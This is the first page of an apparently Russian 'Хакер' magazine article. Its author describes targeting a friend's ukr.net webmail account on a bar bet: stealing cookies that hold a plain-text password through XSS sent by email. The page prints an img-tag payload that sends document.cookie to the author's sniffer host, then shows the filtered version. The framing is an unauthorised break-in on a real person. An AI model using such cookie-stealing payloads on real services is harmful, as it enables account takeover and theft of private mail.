UKR.Net и не будет!

PinkPanther

Хакер, номер #087, стр. 087-086-1

(PinkPanther@HackZona.ru, AntiChat.ru)

Полный захват почтового ящика на www.ukr.net

На сегодняшний день абсолютно любая бесплатная или платная почта, имеющая веб-интерфейс, может быть подвержена XSS-нападению. В некоторых случаях найти дырку легче, в некоторых - сложнее, некоторые баги лежат в привате, некоторые - в паблике, но тем не менее они есть. Сегодня я покажу тебе, как при наличии прямых рук можно полностью захватить ящик самого крутого украинского почтового сервера ukr.net.

пара бутылочек

История эта произошла еще в начале зимы и началась, как это часто бывает, со спора в одном пивном баре. После пары литров пива у нас с приятелем завязался разговор о хакерах и безопасности, потом мы поспорили, что я смогу поиметь его почту, которая находилась на сервере ukr.net. Почему именно эту почту выбрал мой знакомый, я понятия не имею, но это меня вполне устраивало. Я знал, что он проверяет почту через web-интерфейс, да еще и через своего неразлучного друга — ослика. В общем, у меня были все шансы вздрючить наивного товарища. И ты знаешь, я ими сполна воспользовался :).

поверхностный осмотр

Итак, нужно было пощупать сервис изнутри. Помню, еще во времена динозавров бегали там тараканы, но времени прошло много, и я решил не искать следы старых жуков, а найти новых. Прогресс идет вперед - баги тоже. Как ты думаешь, что надо сделать первым делом в таком случае? Правильно, я так и сделал. Быстренько зарегистрировав себе ящик fackdahack@ukr.net, я решил для начала поломать самого себя. Как видишь на скрине, под формой авторизации находится панелька с двумя галочками, которые отвечают за запоминание логина/пасса. По умолчанию они, конечно, не активированы, но, возможно, мой дружище юзает эту функцию.

Что самое интересное, если активировать запоминание пароля, то в куки к нам упадет пароль в открытом виде. Вот тебе и первый просчет разработчиков — никакого шифрования, что стало для меня приятным известием.

Идея дальнейшего взлома была до боли банальной: найти XSS`ку, правильно сформировать скриптовый сплоит, отправить письмо с ним и словить на своем снифере его кукисы, в которых, если повезет, будет находиться пароль в чистом виде. Задумка приевшаяся и простая, но тем не менее действующая и более-менее стабильная. Так что следующим шагом стал поиск XSS.

в поисках XSS-дырок

И пошел я по пути от простого к сложному, как учили в детстве. Вспомнив молодость, решил я подгрузить сценарий через картинку. Так давайте посмотрим, что у меня за колдовство получилось. В моем случае получился обычный скрипт такого вида:

<img src="http://privatesniff/1.gif" style="background:white url(javascript:document.images[0].src='http://privatesniff/s.php?'+document.cookie)">

Здесь http://privatesniff/s.php - это мой сайт со снифером s.php, о котором я расскажу немного ниже. Но как и предполагалось, фильтры сработали, и мой код преобразовался вот в такой:

<img src="http://privatesniff/1.gif " xstyle="background: white url(xjavascript:document.images[0].src='http://privatesniff/s.php?'+document.cookie)">

Содержание  Вперед на стр. 087-086-2
загрузка...
Журнал Хакер #151Журнал Хакер #150Журнал Хакер #149Журнал Хакер #148Журнал Хакер #147Журнал Хакер #146Журнал Хакер #145Журнал Хакер #144Журнал Хакер #143Журнал Хакер #142Журнал Хакер #141Журнал Хакер #140Журнал Хакер #139Журнал Хакер #138Журнал Хакер #137Журнал Хакер #136Журнал Хакер #135Журнал Хакер #134Журнал Хакер #133Журнал Хакер #132Журнал Хакер #131Журнал Хакер #130Журнал Хакер #129Журнал Хакер #128Журнал Хакер #127Журнал Хакер #126Журнал Хакер #125Журнал Хакер #124Журнал Хакер #123Журнал Хакер #122Журнал Хакер #121Журнал Хакер #120Журнал Хакер #119Журнал Хакер #118Журнал Хакер #117Журнал Хакер #116Журнал Хакер #115Журнал Хакер #114Журнал Хакер #113Журнал Хакер #112Журнал Хакер #111Журнал Хакер #110Журнал Хакер #109Журнал Хакер #108Журнал Хакер #107Журнал Хакер #106Журнал Хакер #105Журнал Хакер #104Журнал Хакер #103Журнал Хакер #102Журнал Хакер #101Журнал Хакер #100Журнал Хакер #099Журнал Хакер #098Журнал Хакер #097Журнал Хакер #096Журнал Хакер #095Журнал Хакер #094Журнал Хакер #093Журнал Хакер #092Журнал Хакер #091Журнал Хакер #090Журнал Хакер #089Журнал Хакер #088Журнал Хакер #087Журнал Хакер #086Журнал Хакер #085Журнал Хакер #084Журнал Хакер #083Журнал Хакер #082Журнал Хакер #081Журнал Хакер #080Журнал Хакер #079Журнал Хакер #078Журнал Хакер #077Журнал Хакер #076Журнал Хакер #075Журнал Хакер #074Журнал Хакер #073Журнал Хакер #072Журнал Хакер #071Журнал Хакер #070Журнал Хакер #069Журнал Хакер #068Журнал Хакер #067Журнал Хакер #066Журнал Хакер #065Журнал Хакер #064Журнал Хакер #063Журнал Хакер #062Журнал Хакер #061Журнал Хакер #060Журнал Хакер #059Журнал Хакер #058Журнал Хакер #057Журнал Хакер #056Журнал Хакер #055Журнал Хакер #054Журнал Хакер #053Журнал Хакер #052Журнал Хакер #051Журнал Хакер #050Журнал Хакер #049Журнал Хакер #048Журнал Хакер #047Журнал Хакер #046Журнал Хакер #045Журнал Хакер #044Журнал Хакер #043Журнал Хакер #042Журнал Хакер #041Журнал Хакер #040Журнал Хакер #039Журнал Хакер #038Журнал Хакер #037Журнал Хакер #036Журнал Хакер #035Журнал Хакер #034Журнал Хакер #033Журнал Хакер #032Журнал Хакер #031Журнал Хакер #030Журнал Хакер #029Журнал Хакер #028Журнал Хакер #027Журнал Хакер #026Журнал Хакер #025Журнал Хакер #024Журнал Хакер #023Журнал Хакер #022Журнал Хакер #021Журнал Хакер #020Журнал Хакер #019Журнал Хакер #018Журнал Хакер #017Журнал Хакер #016Журнал Хакер #015Журнал Хакер #014Журнал Хакер #013Журнал Хакер #012Журнал Хакер #011Журнал Хакер #010Журнал Хакер #009Журнал Хакер #008Журнал Хакер #007Журнал Хакер #006Журнал Хакер #005Журнал Хакер #004Журнал Хакер #003Журнал Хакер #002Журнал Хакер #001